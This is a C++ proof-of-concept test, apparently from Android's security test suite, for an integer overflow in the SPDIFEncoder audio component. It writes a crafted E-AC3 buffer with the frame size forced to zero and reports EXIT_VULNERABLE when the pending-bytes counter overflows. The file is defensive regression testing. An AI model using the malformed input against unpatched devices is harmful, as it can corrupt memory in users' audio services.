| /** |
| * Copyright (C) 2022 The Android Open Source Project |
| * |
| * Licensed under the Apache License, Version 2.0 (the "License"); |
| * you may not use this file except in compliance with the License. |
| * You may obtain a copy of the License at |
| * |
| * http://www.apache.org/licenses/LICENSE-2.0 |
| * |
| * Unless required by applicable law or agreed to in writing, software |
| * distributed under the License is distributed on an "AS IS" BASIS, |
| * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| * See the License for the specific language governing permissions and |
| * limitations under the License. |
| */ |
| |
| #include <stdlib.h> |
| #include <audio_utils/spdif/SPDIFEncoder.h> |
| #include "../includes/common.h" |
| |
| // Taken as a reference from audio_utils/tests/spdif_tests.cpp "MySPDIFEncoder" |
| class PocSPDIFEncoder : public android::SPDIFEncoder { |
| public: |
| |
| explicit PocSPDIFEncoder(audio_format_t format) |
| : SPDIFEncoder(format) { |
| } |
| |
| PocSPDIFEncoder() = default; |
| |
| size_t getBurstBufferSizeBytes() const { |
| return mBurstBufferSizeBytes; |
| } |
| |
| size_t getByteCursor() const { |
| return mByteCursor; |
| } |
| |
| android::FrameScanner *getFramer() const { |
| return mFramer; |
| } |
| |
| size_t getPayloadBytesPending() const { |
| return mPayloadBytesPending; |
| } |
| |
| ssize_t writeOutput(const void*, size_t numBytes) override { |
| mOutputSizeBytes = numBytes; |
| return numBytes; |
| } |
| |
| size_t mOutputSizeBytes = 0; |
| }; |
| |
| int main() { |
| PocSPDIFEncoder encoder(AUDIO_FORMAT_E_AC3); |
| |
| // Beginning of the file channelcheck_48k6ch.eac3 with frame size |
| // forced to zero |
| uint8_t buf[] = { 0x0B, 0x77, 0x00, 0x00, 0x3F, 0x85, 0x7F, 0xE8, 0x1E, |
| 0x40, 0x82, 0x10, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, |
| 0xFC, 0x60, 0x80, 0x7E, 0x59, 0x00, 0xFC, 0xF3, 0xCF, 0x01, 0xF9, |
| 0xE7 }; |
| encoder.write(buf, sizeof(buf)); |
| |
| size_t bufferSize = encoder.getBurstBufferSizeBytes(); |
| |
| // If vulnerability is present, 'mPayloadBytesPending' will be assigned |
| // a large overflowed value |
| size_t pendingBytes = encoder.getPayloadBytesPending(); |
| |
| // 'mBurstBufferSizeBytes' shouldn't be lesser than 'mPayloadBytesPending', |
| // this will happen if 'mPayloadBytesPending' holds a overflowed value |
| return (bufferSize < pendingBytes) ? EXIT_VULNERABLE : EXIT_SUCCESS; |
| } |